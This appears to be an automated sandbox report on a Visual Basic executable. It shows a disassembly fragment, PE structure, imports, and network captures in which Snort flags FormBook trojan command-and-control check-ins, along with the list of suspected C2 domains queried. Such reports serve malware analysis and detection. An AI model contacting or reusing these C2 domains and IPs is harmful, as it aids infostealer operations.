                                                        and byte ptr [esi-01h], ah
                                                        retn 7379h
                                                        mov esp, 70824472h
                                                        add eax, E95CAFBAh
                                                        mov eax, 96D22F46h
                                                        test al, 21h
                                                        fild word ptr [esi-7Bh]
                                                        mov eax, ebx
                                                        xor eax, BEEDD1D0h
                                                        cmp cl, byte ptr [edi-53h]
                                                        xor ebx, dword ptr [ecx-48EE309Ah]
                                                        or al, 00h
                                                        stosb
                                                        add byte ptr [eax-2Dh], ah
                                                        xchg eax, ebx
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add ch, byte ptr [esi]
                                                        add byte ptr [eax], al
                                                        out dx, al
                                                        daa
                                                        add byte ptr [eax], al
                                                        add byte ptr [6D6F4C00h], cl
                                                        insd
                                                        insb
                                                        jns 00007F2904815149h
                                                        je 00007F2904815147h
                                                        jc 00007F2904815150h
                                                        add byte ptr [4D000901h], cl
                                                        outsb
                                                        insd
                                                        imul esp, dword ptr [ebx+74h], 00006E65h

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x13714 | 0x3c | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16000 | 0x5aa64 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x238 | 0x30 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0xd8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x12b24 | 0x13000 | False | 0.444464432566 | data | 6.20247491398 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x14000 | 0x19cc | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x16000 | 0x5aa64 | 0x5b000 | False | 0.0544755537431 | data | 3.57347405525 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x161d8 | 0x42028 | data | |
RT_ICON | 0x58200 | 0x468 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0x58668 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | |
RT_ICON | 0x5ac10 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0 | |
RT_ICON | 0x5bcb8 | 0x10828 | dBase III DBT, version number 0, next free block index 40 | |
RT_ICON | 0x6c4e0 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | |
RT_GROUP_ICON | 0x70708 | 0x5a | data | |
RT_VERSION | 0x70764 | 0x300 | data | Chinese | China

Imports

DLL | Import
USER32.DLL | HideCaret
MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description | Data
Translation | 0x0804 0x04b0
LegalCopyright | Internal Verify Number,88
InternalName | Vrdihftetgo6
FileVersion | 1.00
CompanyName | Internal Verify Number,88
LegalTrademarks | Internal Verify Number,88
ProductName | Tred6
ProductVersion | 1.00
OriginalFilename | Vrdihftetgo6.exe

Possible Origin

Language of compilation system | Country where language is spoken
Chinese | China

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/25/21-15:28:20.874775 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49751 | 34.102.136.180 | 192.168.2.6
02/25/21-15:28:31.319640 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49752 | 34.102.136.180 | 192.168.2.6
02/25/21-15:28:36.463718 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49753 | 80 | 192.168.2.6 | 104.21.32.11
02/25/21-15:28:36.463718 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49753 | 80 | 192.168.2.6 | 104.21.32.11
02/25/21-15:28:36.463718 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49753 | 80 | 192.168.2.6 | 104.21.32.11
02/25/21-15:28:57.410074 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49756 | 80 | 192.168.2.6 | 34.102.136.180
02/25/21-15:28:57.410074 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49756 | 80 | 192.168.2.6 | 34.102.136.180
02/25/21-15:28:57.410074 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49756 | 80 | 192.168.2.6 | 34.102.136.180
02/25/21-15:28:57.549735 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49756 | 34.102.136.180 | 192.168.2.6

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 25, 2021 15:27:34.845195055 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:34.902072906 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:34.902928114 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:34.902947903 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:34.960144997 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:34.976227045 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:34.976279020 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:34.976319075 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:34.976358891 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:34.977421999 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:34.977448940 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.010773897 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.067878962 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.067979097 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.069430113 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.130521059 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.344265938 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.344293118 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.344309092 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.344326019 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.344342947 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.344396114 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.344425917 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.344432116 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.348267078 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.348299026 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.348428011 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.348448038 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.352293968 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.352324963 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.352385044 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.352400064 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.356398106 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.356426954 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.356524944 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.356559992 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.360461950 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.360491037 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.360615015 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.363842010 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.363874912 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.363997936 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.364026070 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.400667906 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.400763988 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.400851965 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.400897980 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.402714014 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.402760983 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.402853012 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.402888060 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.406702995 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.406771898 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.406838894 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.406871080 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.410836935 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.410886049 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.410983086 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.411034107 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.414963007 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.415035009 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.415090084 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.415124893 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.418934107 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.418999910 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.419064999 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.419095993 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.422894001 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.422943115 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.423062086 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.423089981 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.426944971 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.426980019 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.427124023 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.427151918 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.430870056 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.430893898 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.431045055 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.434407949 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.434427977 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.434585094 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.434619904 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.437964916 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.437983036 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.438077927 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.441648006 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.441701889 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.441809893 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.441854000 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.445099115 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.445138931 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.445247889 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.445278883 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.448672056 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.448693991 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.448916912 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.452217102 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.452244997 CET | 443 | 49731 | 142.250.184.65 | 192.168.2.6
Feb 25, 2021 15:27:35.452334881 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65
Feb 25, 2021 15:27:35.452358961 CET | 49731 | 443 | 192.168.2.6 | 142.250.184.65

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 25, 2021 15:26:36.363197088 CET | 62044 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:26:36.415146112 CET | 53 | 62044 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:26:37.083556890 CET | 63791 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:26:37.207940102 CET | 53 | 63791 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:26:37.499722958 CET | 64267 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:26:37.548569918 CET | 53 | 64267 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:01.039057970 CET | 49448 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:01.090601921 CET | 53 | 49448 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:03.534804106 CET | 60342 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:03.583540916 CET | 53 | 60342 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:04.535751104 CET | 61346 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:04.584486961 CET | 53 | 61346 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:05.010003090 CET | 51774 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:05.083044052 CET | 53 | 51774 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:10.154453039 CET | 56023 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:10.203207016 CET | 53 | 56023 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:26.673043013 CET | 58384 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:26.730257034 CET | 53 | 58384 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:27.248931885 CET | 60261 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:27.297878981 CET | 53 | 60261 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:27.884032011 CET | 56061 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:27.912038088 CET | 58336 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:27.944832087 CET | 53 | 56061 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:27.970105886 CET | 53 | 58336 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:28.377211094 CET | 53781 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:28.434453964 CET | 53 | 53781 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:28.983582973 CET | 54064 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:29.040890932 CET | 53 | 54064 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:29.586369038 CET | 52811 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:29.643608093 CET | 53 | 52811 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:30.222332954 CET | 55299 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:30.273936987 CET | 53 | 55299 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:30.751652002 CET | 63745 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:30.800967932 CET | 53 | 63745 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:30.970714092 CET | 50055 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:31.019571066 CET | 53 | 50055 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:31.933904886 CET | 61374 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:31.991522074 CET | 53 | 61374 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:32.505878925 CET | 50339 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:32.563148022 CET | 53 | 50339 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:32.652925014 CET | 63307 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:32.712477922 CET | 53 | 63307 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:34.701713085 CET | 49694 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:34.759253979 CET | 53 | 49694 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:34.770870924 CET | 54982 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:34.839993000 CET | 53 | 54982 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:35.682416916 CET | 50010 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:35.731241941 CET | 53 | 50010 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:37.031013012 CET | 63718 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:37.092623949 CET | 53 | 63718 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:37.407264948 CET | 62116 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:37.456093073 CET | 53 | 62116 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:38.197658062 CET | 63816 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:38.256480932 CET | 53 | 63816 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:39.326152086 CET | 55014 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:40.326461077 CET | 55014 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:41.342689037 CET | 55014 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:41.391722918 CET | 53 | 55014 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:42.336472988 CET | 62208 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:43.343368053 CET | 62208 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:43.394613981 CET | 53 | 62208 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:44.343007088 CET | 57574 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:44.394748926 CET | 53 | 57574 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:45.676320076 CET | 51818 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:45.725630045 CET | 53 | 51818 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:47.033123016 CET | 56628 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:47.085913897 CET | 53 | 56628 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:48.191987991 CET | 60778 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:48.243650913 CET | 53 | 60778 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:49.209219933 CET | 53799 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:49.257906914 CET | 53 | 53799 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:50.176558018 CET | 54683 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:50.228135109 CET | 53 | 54683 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:51.125828981 CET | 59329 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:51.174660921 CET | 53 | 59329 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:52.146334887 CET | 64021 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:52.195430040 CET | 53 | 64021 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:27:57.714442968 CET | 56129 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:27:57.791071892 CET | 53 | 56129 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:28:14.912911892 CET | 58177 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:28:14.984534025 CET | 53 | 58177 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:28:15.180850029 CET | 50700 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:28:15.232400894 CET | 53 | 50700 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:28:20.623471975 CET | 54069 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:28:20.691571951 CET | 53 | 54069 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:28:25.941293001 CET | 61178 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:28:26.025517941 CET | 53 | 61178 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:28:31.063088894 CET | 57017 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:28:31.136027098 CET | 53 | 57017 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:28:36.343516111 CET | 56327 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:28:36.406847000 CET | 53 | 56327 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:28:39.415992022 CET | 50243 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:28:39.467735052 CET | 53 | 50243 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:28:39.870378017 CET | 62055 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:28:39.935050964 CET | 53 | 62055 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:28:46.895540953 CET | 61249 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:28:47.162172079 CET | 53 | 61249 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:28:52.174387932 CET | 65252 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:28:52.288326025 CET | 53 | 65252 | 8.8.8.8 | 192.168.2.6
Feb 25, 2021 15:28:57.299858093 CET | 64367 | 53 | 192.168.2.6 | 8.8.8.8
Feb 25, 2021 15:28:57.367551088 CET | 53 | 64367 | 8.8.8.8 | 192.168.2.6

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 25, 2021 15:27:34.770870924 CET | 192.168.2.6 | 8.8.8.8 | 0xf69c | Standard query (0) | doc-08-78-docs.googleusercontent.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:27:38.197658062 CET | 192.168.2.6 | 8.8.8.8 | 0xe44e | Standard query (0) | cdn.onenote.net | A (IP address) | IN (0x0001)
Feb 25, 2021 15:28:14.912911892 CET | 192.168.2.6 | 8.8.8.8 | 0xce23 | Standard query (0) | www.aserchofalltrades.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:28:20.623471975 CET | 192.168.2.6 | 8.8.8.8 | 0x6a23 | Standard query (0) | www.parentseducationalco-op.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:28:25.941293001 CET | 192.168.2.6 | 8.8.8.8 | 0x489f | Standard query (0) | www.blackholidayco.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:28:31.063088894 CET | 192.168.2.6 | 8.8.8.8 | 0x777d | Standard query (0) | www.allsalesvinyl.net | A (IP address) | IN (0x0001)
Feb 25, 2021 15:28:36.343516111 CET | 192.168.2.6 | 8.8.8.8 | 0x5687 | Standard query (0) | www.pardsoda.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:28:46.895540953 CET | 192.168.2.6 | 8.8.8.8 | 0x1dc8 | Standard query (0) | www.asesorgrupovivir.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:28:52.174387932 CET | 192.168.2.6 | 8.8.8.8 | 0x4206 | Standard query (0) | www.joybirder.com | A (IP address) | IN (0x0001)
Feb 25, 2021 15:28:57.299858093 CET | 192.168.2.6 | 8.8.8.8 | 0x584b | Standard query (0) | www.sixteen3handscottages.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
